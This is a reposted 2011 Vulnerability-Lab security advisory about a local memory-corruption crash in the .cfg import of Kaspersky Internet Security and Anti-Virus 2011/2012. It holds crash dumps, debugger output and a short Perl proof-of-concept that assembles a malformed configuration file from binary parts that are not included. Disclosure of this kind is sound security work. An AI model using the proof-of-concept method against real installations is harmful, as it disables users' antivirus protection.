Kaspersky Internet Security / Anti-Virus 2011 / 2012 Memory Corruption

2011-12-20T00:00:00
ID PACKETSTORM:108043
Type packetstorm
Reporter Benjamin Kunz Mejri
Modified 2011-12-20T00:00:00

Description

                                        
                                            `Title:  
======  
Kaspersky IS&AV 2011/12 - Memory Corruption Vulnerability  
  
  
Date:  
=====  
2011-12-19  
  
  
References:  
===========  
http://www.vulnerability-lab.com/get_content.php?id=129  
  
  
VL-ID:  
=====  
129  
  
  
Introduction:  
=============  
Kaspersky Internet Security 2011 has everything that you need to stay safe and secure while you re surfing the web.   
It provides constant protection for you and your family – whether you work, bank, shop or play online.  
  
Kaspersky Anti-Virus 2011 – the backbone of your PC’s security system, offering real-time automated protection from   
a range of IT threats. Kaspersky Anti-Virus 2011 provides the basic tools needed to protect your PC. Our award-winning   
technologies work silently in the background while you enjoy your digital life.  
  
(Copy of Vendor Homepage: http://www.kaspersky.com/kaspersky_anti-virus && http://www.kaspersky.com/kaspersky_internet_security)  
  
  
Abstract:  
=========  
Vulnerability-Lab Team discovered a Memory & Pointer Corruption Vulnerability on Kaspersky Internet Security 2011/2012 & Kaspersky Anti-Virus 2011/2012.  
  
  
Report-Timeline:  
================  
2010-12-04: Vendor Notification  
2011-01-16: Vendor Response/Feedback  
2011-12-19: Public or Non-Public Disclosure  
  
  
Status:  
========  
Published  
  
  
Affected Products:  
==================  
  
Exploitation-Technique:  
=======================  
Local  
  
  
Severity:  
=========  
Medium  
  
  
Details:  
========  
A Memory Corruption vulnerability is detected on Kaspersky Internet Security 2011/2012 & Kaspersky Anti-Virus 2011/2012.   
The vulnerability is caused by an invalid pointer corruption when processing a corrupt .cfg file through the kaspersky exception filters,   
which could be exploited by attackers to crash he complete software process.   
The bug is located over the basegui.ppl & basegui.dll when processing a .cfg file import.  
  
  
Vulnerable Modules:   
  
[+] CFG IMPORT  
  
  
Affected Version(s):  
Kaspersky Anti-Virus 2012 & Kaspersky Internet Security 2012  
KIS 2012 v12.0.0.374  
KAV 2012 v12.x  
  
Kaspersky Anti-Virus 2011 & Kaspersky Internet Security 2011  
KIS 2011 v11.0.0.232 (a.b)  
KAV 11.0.0.400  
KIS 2011 v12.0.0.374  
  
Kaspersky Anti-Virus 2010 & Kaspersky Internet Security 2010  
  
  
--- Kaspersky Bug Logs ---  
  
Folder: ../Analyses/Crash Reports (KIS&KAV)  
  
KAV.11.0.0.232_08.04_22.24_3620.GUI.full.dmp  
KAV.11.0.0.232_08.04_22.24_3620.GUI.mini.dmp  
KAV.11.0.0.232_08.04_22.24_3620.GUI.tiny.dmp  
  
KAV.11.0.0.232_08.04_22.28_2956.GUI.full.dmp  
KAV.11.0.0.232_08.04_22.28_2956.GUI.mini.dmp  
KAV.11.0.0.232_08.04_22.28_2956.GUI.tiny.dmp  
  
KAV.11.0.0.232?_08.04_23.21_3712.GUI.full.dmp  
KAV.11.0.0.232?_08.04_23.21_3712.GUI.mini.dmp  
KAV.11.0.0.232?_08.04_23.21_3712.GUI.tiny.dmp  
  
KAV.11.0.0.232?_08.04_23.54_2640.GUI.full.dmp  
KAV.11.0.0.232?_08.04_23.54_2640.GUI.mini.dmp  
KAV.11.0.0.232?_08.04_23.54_2640.GUI.tiny.dmp  
  
Reference(s):   
../Analyses/Crash Reports (KIS&KAV)/kav_x32.rar  
../Analyses/Crash Reports (KIS&KAV)/kis_x32-win7.zip  
../Analyses/Crash Reports (KIS&KAV)/kis_x64.zip  
  
  
  
--- Service Crash Report Queue Logs ---  
  
Folder: ../Analyses/Crash Reports (Service)  
  
AppCrash_avp.exe_1d98841adaefc9689cba9c4bbd7  
AppCrash_avp.exe_434b4962a0ccbccd3c2a6bd5f95  
AppCrash_avp.exe_583f849d49fe1a714c9bd02ba4e  
AppCrash_avp.exe_5f09d49c257b515e08a6defbf11  
AppCrash_avp.exe_69cb355e72347419436f047a313  
AppCrash_avp.exe_69cb355e72347419436f047a313  
AppCrash_avp.exe_a7a7fe58d34d13f0136d933e977  
AppCrash_avp.exe_d21fe6df9c207eac2d8c6bcacad  
AppCrash_avp.exe_d2c8cf27ba2a3f6ceaad6c44327  
AppCrash_avp.exe_ed94bb914e255192b71d1257c19  
  
  
Version=1  
EventType=APPCRASH  
EventTime=129256270253026260  
ReportType=2  
Consent=1  
UploadTime=129256270260076663  
ReportIdentifier=d70927a2-a1d7-11df-81a1-95fa4108d4d6  
IntegratorReportIdentifier=d70927a1-a1d7-11df-81a1-95fa4108d4d6  
WOW64=1  
Response.BucketId=1985200055  
Response.BucketTable=1  
Response.type=4  
Sig[0].Name=Anwendungsname  
Sig[0].Value=avp.exe  
Sig[1].Name=Anwendungsversion  
Sig[1].Value=11.0.1.400  
Sig[2].Name=Anwendungszeitstempel  
Sig[2].Value=4c2cd011  
Sig[3].Name=Fehlermodulname  
Sig[3].Value=basegui.ppl  
Sig[4].Name=Fehlermodulversion  
Sig[4].Value=11.0.1.400  
Sig[5].Name=Fehlermodulzeitstempel  
Sig[5].Value=4c2cd193  
Sig[6].Name=Ausnahmecode  
Sig[6].Value=c0000005  
Sig[7].Name=Ausnahmeoffset  
Sig[7].Value=00079c3c  
DynamicSig[1].Name=Betriebsystemversion  
DynamicSig[1].Value=6.1.7600.2.0.0.768.3  
DynamicSig[2].Name=Gebietsschema-ID  
DynamicSig[2].Value=1031  
DynamicSig[22].Name=Zusatzinformation 1  
DynamicSig[22].Value=0a9e  
DynamicSig[23].Name=Zusatzinformation 2  
DynamicSig[23].Value=0a9e372d3b4ad19135b953a78882e789  
DynamicSig[24].Name=Zusatzinformation 3  
DynamicSig[24].Value=0a9e  
DynamicSig[25].Name=Zusatzinformation 4  
DynamicSig[25].Value=0a9e372d3b4ad19135b953a78882e789  
UI[2]=C://Program Files (x86)/Kaspersky Lab/Kaspersky Internet Security 2011/avp.exe  
UI[3]=Kaspersky Anti-Virus funktioniert nicht mehr  
UI[4]=Windows kann online nach einer Lösung für das Problem suchen und versuchen, das Programm neu zu starten.  
UI[5]=Online nach einer Lösung suchen und das Programm neu starten  
UI[6]=Später online nach einer Lösung suchen und das Programm schließen  
UI[7]=Programm schließen  
LoadedModule[0]=C:/Program Files (x86)/Kaspersky Lab/Kaspersky Internet Security 2011/avp.exe  
LoadedModule[1]=C://Windows/SysWOW64/ntdll.dll  
LoadedModule[2]=C://Windows/syswow64/kernel32.dll  
LoadedModule[3]=C:/Windows/syswow64/KERNELBASE.dll  
...  
...  
LoadedModule[148]=C://Windows//SysWOW64//WMVCore.DLL  
LoadedModule[149]=C://Windows////SysWOW64//WMASF.DLL  
LoadedModule[150]=C://Windows//////SysWOW64////EhStorAPI.dll  
LoadedModule[151]=C://Program Files (x86)//Internet Explorer//ieproxy.dll  
LoadedModule[152]=C://Windows//SysWOW64//SAMLIB.dll  
State[0].Key=Transport.DoneStage1  
State[0].Value=1  
State[1].Key=DataRequest  
State[1].Value=Bucket=1985200055/nBucketTable=1/nResponse=1/n  
FriendlyEventName=Nicht mehr funktionsfähig  
ConsentKey=APPCRASH  
AppName=Kaspersky Anti-Virus  
AppPath=C://Program Files (x86)//Kaspersky Lab//Kaspersky Internet Security 2011//avp.exe  
  
  
  
  
--- System Crash Report Queue Logs ---  
  
Folder: Analyses//Crash Reports (System)  
  
WER7A62.tmp.appcompat.txt  
WER7FFE.tmp.mdmp  
WER6127.tmp.WERInternalMetadata.xml  
  
  
  
--- Exception Log ---  
(a50.ee8): Access violation - code c0000005 (first/second chance not available)  
eax=00000000 ebx=0331e7bc ecx=9699eef0 edx=6ddf9ba0 esi=00000002 edi=00000000  
eip=76f900ed esp=0331e76c ebp=0331e808 iopl=0 nv up ei pl nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202  
  
  
  
  
--- Debug Logs ---  
FAULTING_IP:   
basegui+79bed  
6ddf9bed 8b11 mov edx,dword ptr [ecx]  
  
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)  
ExceptionAddress: 6ddf9bed (basegui+0x00079bed)  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000000  
NumberParameters: 2  
Parameter[0]: 00000000  
Parameter[1]: 9699eef0  
Attempt to read from address 9699eef0  
  
PROCESS_NAME: avp.exe  
  
FAULTING_MODULE: 755b0000 kernel32  
DEBUG_FLR_IMAGE_TIMESTAMP: 4c4f15cf  
MODULE_NAME: basegui  
ERROR_CODE: (NTSTATUS) 0xc0000005 - Die Anweisung in 0x%08lx verweist auf Speicher 0x%08lx. Der Vorgang %s konnte nicht im Speicher durchgef hrt werden.  
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - Die Anweisung in 0x%08lx verweist auf Speicher 0x%08lx. Der Vorgang %s konnte nicht im Speicher durchgef hrt werden.  
EXCEPTION_PARAMETER1: 00000000  
EXCEPTION_PARAMETER2: 9699eef0  
  
READ_ADDRESS: 9699eef0   
  
FOLLOWUP_IP:   
basegui+79bed  
6ddf9bed 8b11 mov edx,dword ptr [ecx]  
  
FAULTING_THREAD: 00000ee8  
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_INVALID_POINTER_READ  
PRIMARY_PROBLEM_CLASS: INVALID_POINTER_WRITE  
DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE  
LAST_CONTROL_TRANSFER: from 6ddf9bfd to 6ddf9bed  
  
STACK_TEXT:   
0331f9b8 6ddf9bfd 0331fa54 02485068 00000001 basegui+0x79bed  
0331f9f0 6ddf9bfd 0331fa54 02485068 00000001 basegui+0x79bfd  
0331fa28 6de5bd10 0331fa54 02485068 00000001 basegui+0x79bfd  
0331fa48 6de33ad0 0331fa54 000001f6 000001c2 basegui!DllUnregisterServer+0x12580  
0331fa5c 6de34320 00000200 00000000 01c201f6 basegui+0xb3ad0  
0331fa9c 6de34d45 000504b4 00000200 00000000 basegui+0xb4320  
0331fae0 6de33fdd 000504b4 00000200 00000000 basegui+0xb4d45  
0331fb30 754c6238 00000000 00000200 00000000 basegui+0xb3fdd  
0331fb5c 754f12a1 02bb0fb0 000504b4 00000200 user32!gapfnScSendMessage+0x270  
0331fbd8 754f10e2 0059afd4 02bb0fb0 000504b4 user32!SendNotifyMessageW+0x341  
0331fc28 754f11e7 00a06c90 00000000 00000200 user32!SendNotifyMessageW+0x182  
0331fc48 754c6238 000504b4 00000200 00000000 user32!SendNotifyMessageW+0x287  
0331fc74 754c68ea 754f11be 000504b4 00000200 user32!gapfnScSendMessage+0x270  
0331fcec 754c7d31 0059afd4 76db3908 000504b4 user32!gapfnScSendMessage+0x922  
0331fd4c 754c7dfa 76db3908 00000000 0331fd88 user32!LoadStringW+0x11f  
0331fd5c 754e2292 0331fe18 00000000 0331fe18 user32!DispatchMessageW+0xf  
0331fd88 754e70a9 000504b4 00000000 02485048 user32!IsDialogMessageW+0x11e  
0331fdb0 6de2e50b 000504b4 0331fe18 023d9be8 user32!IsDialogMessage+0x58  
0331fdcc 6de20c1c 0331fe18 74113b90 00000000 basegui+0xae50b  
0331fdfc 6de231a8 0331fe18 7411383c 02e260ec basegui+0xa0c1c  
0331fe50 6de07dbc 00000000 005e8228 6ddd6f8c basegui+0xa31a8  
0331fe64 72da3487 00000003 00000000 005e8244 basegui+0x87dbc  
  
  
STACK_COMMAND: ~5s; .ecxr ; kb  
SYMBOL_STACK_INDEX: 0  
SYMBOL_NAME: basegui+79bed  
FOLLOWUP_NAME: MachineOwner  
IMAGE_NAME: basegui.ppl  
BUCKET_ID: WRONG_SYMBOLS  
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_basegui.ppl!Unknown  
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/avp_exe/11_0_0_232/4be3cfb6/basegui_ppl/11_0_0_241/4c4f15cf/c0000005/00079bed.htm?Retriage=1  
  
Followup: MachineOwner  
---------  
0:005> lmvm basegui  
start end module name  
6dd80000 6df19000 basegui (export symbols) basegui.ppl  
Loaded symbol image file: basegui.ppl  
Image path: C://Program Files (x86)//Kaspersky Lab//Kaspersky Internet Security 2011//basegui.ppl  
Image name: basegui.ppl  
Timestamp: Tue Jul 27 19:22:23 2010 (4C4F15CF)  
CheckSum: 0019E22D  
ImageSize: 00199000  
File version: 11.0.0.241  
Product version: 11.0.0.241  
File flags: 0 (Mask 3F)  
File OS: 40004 NT Win32  
File type: 1.0 App  
File date: 00000000.00000000  
Translations: 0409.04b0  
CompanyName: Kaspersky Lab ZAO  
ProductName: Kaspersky Anti-Virus  
InternalName: BASEGUI  
OriginalFilename: BASEGUI.DLL  
ProductVersion: 11.0.0.241  
FileVersion: 11.0.0.241  
FileDescription: Kaspersky Anti-Virus GUI Windows part  
LegalCopyright: Copyright © Kaspersky Lab ZAO 1997-2010.  
LegalTrademarks: Kaspersky™ Anti-Virus ® is registered trademark of Kaspersky Lab ZAO.  
0:005> .exr 0xffffffffffffffff  
ExceptionAddress: 6ddf9bed (basegui+0x00079bed)  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000000  
NumberParameters: 2  
Parameter[0]: 00000000  
Parameter[1]: 9699eef0  
Attempt to read from address 9699eef0  
  
  
Information:  
The kaspersky .cfg file import exception-handling filters wrong or manipulated file imports like one this first test ... (wrong-way.png).  
The PoC is not affected by the import exception-handling & get through without any problems. A invalid pointer write & read allows  
an local attacker to crash the software via memory corruption. The technic & software to detect the bug in the binary is prv8.  
  
Notice:  
An local attacker do not need to know any passwords to load a .cfg (Configuration) file. (access-rights.png)  
  
  
Folder:   
../Analyses/Debug  
  
  
References(Pictures):  
../appcrash1.png  
../appcrash2.png  
../appcrash3.png  
../appcrash4.png  
../appcrash5.png  
../debug&exception.png  
../kav2011.png  
../reproduce-x32.png  
../wrong-way.png  
../access-rights.png  
  
  
Proof of Concept:  
=================  
The vulnerability can be exploited by local attackers via import or remote attacker via user inter action.   
For demonstration or reproduce ...  
  
  
#!/usr/bin/perl  
##############################################################################  
my $code="corrupt" x 1;  
###################################################################  
$FH1 = "file1";  
$FilePath1 = "part1.bin";  
$FH2 = "file2";  
$FilePath2 = "part2.bin";  
###################################################################  
open(myfile,'>> poc_pwn.cfg');  
binmode myfile;  
###################################################################  
open(FH1, $FilePath1);  
binmode FH1;  
while (<FH1>) {  
print myfile;  
}  
close(FH1);  
print myfile $code;  
open(FH2, $FilePath2);  
binmode FH2;  
while (<FH2>) {  
print myfile;  
}  
close(FH2);  
###################################################################  
  
  
PoC:   
../PoC/kis&kav_2011_2012_p0c.pl  
../PoC/part1.bin  
../PoC/part2.bin  
  
  
Risk:  
=====  
The security risk of the bug/vulnerability is estimated as medium(+).  
  
  
Credits:  
========  
Vulnerability Research Laboratory - Benjamin K.M. (Rem0ve)  
  
  
Disclaimer:  
===========  
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,   
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-  
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business   
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some   
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation   
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-  
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of   
other media, are reserved by Vulnerability-Lab or its suppliers.  
  
Copyright © 2011|Vulnerability-Lab  
  
  
  
  
--   
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com  
Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com  
  
`